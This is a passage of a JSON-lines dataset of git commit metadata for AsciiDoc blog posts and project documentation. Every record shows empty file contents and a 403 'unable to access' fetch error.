/camel,neoramon\/camel,tdiesler\/camel,ullgren\/camel,rmarting\/camel,gilfernandes\/camel,chirino\/camel,sirlatrom\/camel,Thopap\/camel,davidkarlsen\/camel,davidkarlsen\/camel,tadayosi\/camel,tdiesler\/camel,hqstevenson\/camel,gilfernandes\/camel,mgyongyosi\/camel,tkopczynski\/camel,jonmcewen\/camel,sirlatrom\/camel,nicolaferraro\/camel,jamesnetherton\/camel,pmoerenhout\/camel,tkopczynski\/camel,nikhilvibhav\/camel,snurmine\/camel,dmvolod\/camel,bhaveshdt\/camel,kevinearls\/camel,objectiser\/camel,gautric\/camel,pmoerenhout\/camel,christophd\/camel,adessaigne\/camel,nikhilvibhav\/camel,anton-k11\/camel,prashant2402\/camel,cunningt\/camel,RohanHart\/camel,neoramon\/camel,yuruki\/camel,jkorab\/camel,lburgazzoli\/apache-camel,ullgren\/camel,NickCis\/camel,gautric\/camel,pmoerenhout\/camel,ullgren\/camel,pax95\/camel,jonmcewen\/camel,JYBESSON\/camel,akhettar\/camel,tlehoux\/camel,prashant2402\/camel,pax95\/camel,tdiesler\/camel,neoramon\/camel,jamesnetherton\/camel,gautric\/camel,bgaudaen\/camel,JYBESSON\/camel,tkopczynski\/camel,mcollovati\/camel,sabre1041\/camel,gautric\/camel,scranton\/camel,punkhorn\/camel-upstream,yuruki\/camel,cunningt\/camel,curso007\/camel,chirino\/camel,akhettar\/camel,tlehoux\/camel,w4tson\/camel,zregvart\/camel,Fabryprog\/camel,w4tson\/camel,neoramon\/camel,ssharma\/camel,mgyongyosi\/camel,tdiesler\/camel,jonmcewen\/camel,pkletsko\/camel,bgaudaen\/camel,w4tson\/camel,CodeSmell\/camel,JYBESSON\/camel,christophd\/camel,sirlatrom\/camel,prashant2402\/camel,anoordover\/camel,nicolaferraro\/camel,nboukhed\/camel,jarst\/camel,lburgazzoli\/camel,veithen\/camel,NickCis\/camel,curso007\/camel,anoordover\/camel,acartapanis\/camel,anton-k11\/camel,YoshikiHigo\/camel,scranton\/camel,apache\/camel,pax95\/camel,snurmine\/camel,christophd\/camel,isavin\/camel,cunningt\/camel,tkopczynski\/camel,tadayosi\/camel,driseley\/camel,alvinkwekel\/camel,jarst\/camel,chirino\/camel,gnodet\/camel,onders86\/camel,drsquidop\/camel,driseley\/camel,jamesnetherton\/camel,anton-k11\/camel,adessaigne\/camel,gilfernandes\/camel,bgaudaen\/camel,punkhorn\/camel-upstream,onders86\/camel,CodeSmell\/camel,rmarting\/camel,RohanHart\/camel,bhaveshdt\/camel,ssharma\/camel,tadayosi\/camel,neoramon\/camel,lburgazzoli\/apache-camel,alvinkwekel\/camel,zregvart\/camel,kevinearls\/camel,mgyongyosi\/camel,JYBESSON\/camel,drsquidop\/camel,lburgazzoli\/camel,tlehoux\/camel,sirlatrom\/camel,jarst\/camel,sabre1041\/camel,gilfernandes\/camel,ssharma\/camel,veithen\/camel,dmvolod\/camel,gilfernandes\/camel,mcollovati\/camel,allancth\/camel,snurmine\/camel,lburgazzoli\/camel,rmarting\/camel,apache\/camel,bhaveshdt\/camel,dmvolod\/camel,jkorab\/camel,objectiser\/camel,dmvolod\/camel,chirino\/camel,curso007\/camel,DariusX\/camel,objectiser\/camel,kevinearls\/camel,nboukhed\/camel,pmoerenhout\/camel,onders86\/camel,pax95\/camel,mcollovati\/camel,punkhorn\/camel-upstream,prashant2402\/camel","old_file":"components\/camel-avro\/src\/main\/docs\/avro-dataformat.adoc","new_file":"components\/camel-avro\/src\/main\/docs\/avro-dataformat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a33fc96c06f604a3a87b850871bef1b3397a6e5d","subject":"Update 2015-05-03-1553.adoc","message":"Update 2015-05-03-1553.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-05-03-1553.adoc","new_file":"_posts\/2015-05-03-1553.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5bccc8772964b636e4a5ac23261475d83d09b7f","subject":"Update 2015-04-15-Development-environment.adoc","message":"Update 2015-04-15-Development-environment.adoc","repos":"der3k\/der3k.github.io,der3k\/der3k.github.io,der3k\/der3k.github.io","old_file":"_posts\/2015-04-15-Development-environment.adoc","new_file":"_posts\/2015-04-15-Development-environment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/der3k\/der3k.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cef496f2084b48b51586901766a13876708cde2c","subject":"Update 2015-07-06-Hybris-E-commerce-suite.adoc","message":"Update 2015-07-06-Hybris-E-commerce-suite.adoc","repos":"jlboes\/jlboes.github.io,jlboes\/jlboes.github.io,jlboes\/jlboes.github.io","old_file":"_posts\/2015-07-06-Hybris-E-commerce-suite.adoc","new_file":"_posts\/2015-07-06-Hybris-E-commerce-suite.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jlboes\/jlboes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12f4b363d17c73324e1c37e73a084d0493dde234","subject":"Added Camel 2.20.2 release notes to docs","message":"Added Camel 2.20.2 release notes to docs\n","repos":"Fabryprog\/camel,onders86\/camel,davidkarlsen\/camel,anoordover\/camel,ullgren\/camel,pax95\/camel,objectiser\/camel,apache\/camel,CodeSmell\/camel,pax95\/camel,onders86\/camel,onders86\/camel,christophd\/camel,kevinearls\/camel,anoordover\/camel,adessaigne\/camel,tadayosi\/camel,nikhilvibhav\/camel,CodeSmell\/camel,christophd\/camel,objectiser\/camel,mcollovati\/camel,pmoerenhout\/camel,pax95\/camel,cunningt\/camel,onders86\/camel,alvinkwekel\/camel,alvinkwekel\/camel,apache\/camel,christophd\/camel,pax95\/camel,zregvart\/camel,CodeSmell\/camel,onders86\/camel,tadayosi\/camel,ullgren\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,mcollovati\/camel,punkhorn\/camel-upstream,tadayosi\/camel,zregvart\/camel,sverkera\/camel,nicolaferraro\/camel,apache\/camel,tdiesler\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,tdiesler\/camel,nicolaferraro\/camel,adessaigne\/camel,tdiesler\/camel,gnodet\/camel,tdiesler\/camel,anoordover\/camel,kevinearls\/camel,objectiser\/camel,anoordover\/camel,davidkarlsen\/camel,pmoerenhout\/camel,gnodet\/camel,adessaigne\/camel,DariusX\/camel,gnodet\/camel,punkhorn\/camel-upstream,ullgren\/camel,tdiesler\/camel,davidkarlsen\/camel,apache\/camel,Fabryprog\/camel,tadayosi\/camel,jamesnetherton\/camel,adessaigne\/camel,DariusX\/camel,DariusX\/camel,onders86\/camel,Fabryprog\/camel,gnodet\/camel,jamesnetherton\/camel,pax95\/camel,CodeSmell\/camel,sverkera\/camel,adessaigne\/camel,cunningt\/camel,alvinkwekel\/camel,cunningt\/camel,christophd\/camel,zregvart\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,anoordover\/camel,zregvart\/camel,DariusX\/camel,jamesnetherton\/camel,jamesnetherton\/camel,cunningt\/camel,apache\/camel,kevinearls\/camel,sverkera\/camel,nicolaferraro\/camel,christophd\/camel,anoordover\/camel,mcollovati\/camel,pmoerenhout\/camel,cunningt\/camel,ullgren\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tdiesler\/camel,objectiser\/camel,apache\/camel,pax95\/camel,adessaigne\/camel,kevinearls\/camel,jamesnetherton\/camel,cunningt\/camel,gnodet\/camel,kevinearls\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,sverkera\/camel,sverkera\/camel,tadayosi\/camel,mcollovati\/camel,tadayosi\/camel,kevinearls\/camel,jamesnetherton\/camel,nicolaferraro\/camel,sverkera\/camel,christophd\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2202-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2202-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6bd7717e8f444fe592b9449b4db5c760a29ece95","subject":"RTGOV-515 Provide information on how to intercept activity events from an OSGi application","message":"RTGOV-515 Provide information on how to intercept activity events from an OSGi application\n","repos":"objectiser\/rtgov,Governance\/rtgov,djcoleman\/rtgov,djcoleman\/rtgov,objectiser\/rtgov,jorgemoralespou\/rtgov,Governance\/rtgov,Governance\/rtgov,objectiser\/rtgov,djcoleman\/rtgov,jorgemoralespou\/rtgov,djcoleman\/rtgov,Governance\/rtgov,jorgemoralespou\/rtgov,objectiser\/rtgov,jorgemoralespou\/rtgov","old_file":"docs\/userguide\/en-US\/UGReportActivityInformation.asciidoc","new_file":"docs\/userguide\/en-US\/UGReportActivityInformation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Governance\/rtgov.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"407b2197f12f8aeb3a2d322a26e801631e19b038","subject":"Blog entry for April 1st.","message":"Blog entry for April 1st.\n","repos":"tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,metlos\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,metlos\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/2015-04-01-1.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/2015-04-01-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1bf4069932671650bd598a0819cd8b207463b042","subject":"Work in progress","message":"Work in progress","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/catalog-examples.adoc","new_file":"userguide\/tutorials\/catalog-examples.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"949c6fb2144bff54587f8839baf0f69a09433022","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7489ed71f1e7a89638c86f05300a2b37c5f5d7ca","subject":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","message":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2d49375a588bc84ccb87e77ad7873f999a8be87","subject":"Update 2016-6-28-PHPER-authority-control-RBAC.adoc","message":"Update 2016-6-28-PHPER-authority-control-RBAC.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-28-PHPER-authority-control-RBAC.adoc","new_file":"_posts\/2016-6-28-PHPER-authority-control-RBAC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81d9a20a92fc95b7d3167a45b39ccb53077e7598","subject":"y2b create post The Perfect Battery Pack?","message":"y2b create post The Perfect Battery Pack?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-03-The-Perfect-Battery-Pack.adoc","new_file":"_posts\/2016-09-03-The-Perfect-Battery-Pack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4b05c1df87712fe3610eb6fc93f51135e83f218","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81d29a9704b75c451c76d0d9b9163b49788a821b","subject":"added travis badge to readme","message":"added travis badge to readme","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,atuljangra\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inserpio\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c64592d0b363dbba2d5494fa06ee3340210cb556","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19c1ed8166c76f42912639e9802396dec205881d","subject":"Update 2017-12-05-Docker.adoc","message":"Update 2017-12-05-Docker.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2017-12-05-Docker.adoc","new_file":"_posts\/2017-12-05-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e7f835c9fd00dc2f2296cc6221bade909dd9fb5","subject":"Update 2016-04-08-Es-mas-facil-con-un-C-M-S.adoc","message":"Update 2016-04-08-Es-mas-facil-con-un-C-M-S.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Es-mas-facil-con-un-C-M-S.adoc","new_file":"_posts\/2016-04-08-Es-mas-facil-con-un-C-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d1aa219dd3e7a8d350be9b3677b738c91a27ed9","subject":"y2b create post What's Hidden In This Hoodie?","message":"y2b create post What's Hidden In This Hoodie?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-23-Whats-Hidden-In-This-Hoodie.adoc","new_file":"_posts\/2016-12-23-Whats-Hidden-In-This-Hoodie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a23e58d361335b2f9ff1fe3dd60be390e831ce36","subject":"y2b create post PlayStation VR Unboxing + Demo","message":"y2b create post PlayStation VR Unboxing + Demo","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-14-PlayStation-VR-Unboxing--Demo.adoc","new_file":"_posts\/2016-10-14-PlayStation-VR-Unboxing--Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f36c2bbae05b689ab60d237701a846305afd2092","subject":"y2b create post FINAL PICK YOUR PRIZE UPDATE!","message":"y2b create post FINAL PICK YOUR PRIZE UPDATE!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-15-FINAL-PICK-YOUR-PRIZE-UPDATE.adoc","new_file":"_posts\/2011-09-15-FINAL-PICK-YOUR-PRIZE-UPDATE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a18d9b0aafac6b7e79026f90cdc04234393ba09","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3bc5916b90d7772397e4ec7626f3e7271f20fbfd","subject":"much needed upgrade to API doc","message":"much needed upgrade to API doc\n","repos":"sirjorj\/libxwing","old_file":"API.adoc","new_file":"API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sirjorj\/libxwing.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"f054095d52c85ee4275a5eb0d884338821060682","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea6a8e3991db33eee977f209cc4614b83646bde2","subject":"Publish 0093-1-1-Puzzle-8-Matrix.adoc","message":"Publish 0093-1-1-Puzzle-8-Matrix.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"0093-1-1-Puzzle-8-Matrix.adoc","new_file":"0093-1-1-Puzzle-8-Matrix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cc7a9a3439a30d68cad6bb4f446845efc4ea7d8","subject":"Update 2016-04-06-Backups.adoc","message":"Update 2016-04-06-Backups.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Backups.adoc","new_file":"_posts\/2016-04-06-Backups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bfc891671fc2653e9f7fb3811617523cd94198d","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82c1aa77e64c610f6b2ac0666ae5435f5f79fa40","subject":"Fix a link in the user guide","message":"Fix a link in the user guide\n","repos":"K2InformaticsGmbH\/ranch,layerhq\/ranch,ninenines\/ranch","old_file":"doc\/src\/guide\/ssl_auth.asciidoc","new_file":"doc\/src\/guide\/ssl_auth.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ninenines\/ranch.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"f3d9d2ec3d1aaf8c21d9353f4022e627a8c9207f","subject":"Update 2015-11-11-Evolve-further.adoc","message":"Update 2015-11-11-Evolve-further.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2015-11-11-Evolve-further.adoc","new_file":"_posts\/2015-11-11-Evolve-further.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fed568328cead814e43eea2652bcb0ae0a1d1de","subject":"fixing https:\/\/github.com\/docker\/labs\/issues\/208","message":"fixing https:\/\/github.com\/docker\/labs\/issues\/208\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c1d9d98295fc46d9528295803afa6a6c4c3c3b38","subject":"y2b create post Nintendo Wii U Deluxe Set Unboxing","message":"y2b create post Nintendo Wii U Deluxe Set Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-15-Nintendo-Wii-U-Deluxe-Set-Unboxing.adoc","new_file":"_posts\/2012-12-15-Nintendo-Wii-U-Deluxe-Set-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68a9de3c63ee685021ee8280b37f4e4242b1dfac","subject":"Update 2016-11-29-Gabe-loses-his-Compasses-for-a-bit.adoc","message":"Update 2016-11-29-Gabe-loses-his-Compasses-for-a-bit.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2016-11-29-Gabe-loses-his-Compasses-for-a-bit.adoc","new_file":"_posts\/2016-11-29-Gabe-loses-his-Compasses-for-a-bit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11334360991053b28fd93f7e2cbd66b985ba9db6","subject":"Add documentation","message":"Add documentation\n","repos":"Kronos-Integration\/kronos-step","old_file":"doc\/step-interface.adoc","new_file":"doc\/step-interface.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kronos-Integration\/kronos-step.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a544fe659998ce665798de0d5022f631ea10f760","subject":"Update 2015-05-06-Test.adoc","message":"Update 2015-05-06-Test.adoc","repos":"dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io","old_file":"_posts\/2015-05-06-Test.adoc","new_file":"_posts\/2015-05-06-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dobin\/dobin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d371418ef34805f14abdceba32852380b45292a7","subject":"Update 2015-09-25-Test.adoc","message":"Update 2015-09-25-Test.adoc","repos":"StefanBertels\/stefanbertels.github.io,StefanBertels\/stefanbertels.github.io,StefanBertels\/stefanbertels.github.io,StefanBertels\/stefanbertels.github.io","old_file":"_posts\/2015-09-25-Test.adoc","new_file":"_posts\/2015-09-25-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/StefanBertels\/stefanbertels.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f7876c04cf39978c8891fd9587cae7f97683473","subject":"Update 2015-12-28-Test.adoc","message":"Update 2015-12-28-Test.adoc","repos":"AirHacX\/blog.airhacx.com,AirHacX\/blog.airhacx.com,AirHacX\/blog.airhacx.com","old_file":"_posts\/2015-12-28-Test.adoc","new_file":"_posts\/2015-12-28-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AirHacX\/blog.airhacx.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7dd54db595ec62c27a83b49a7463867007a76a72","subject":"Update 2019-02-04-Google-Spread-Sheet.adoc","message":"Update 2019-02-04-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8caabd581d42289693fdaccaf2752f71a153229e","subject":"Update 2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 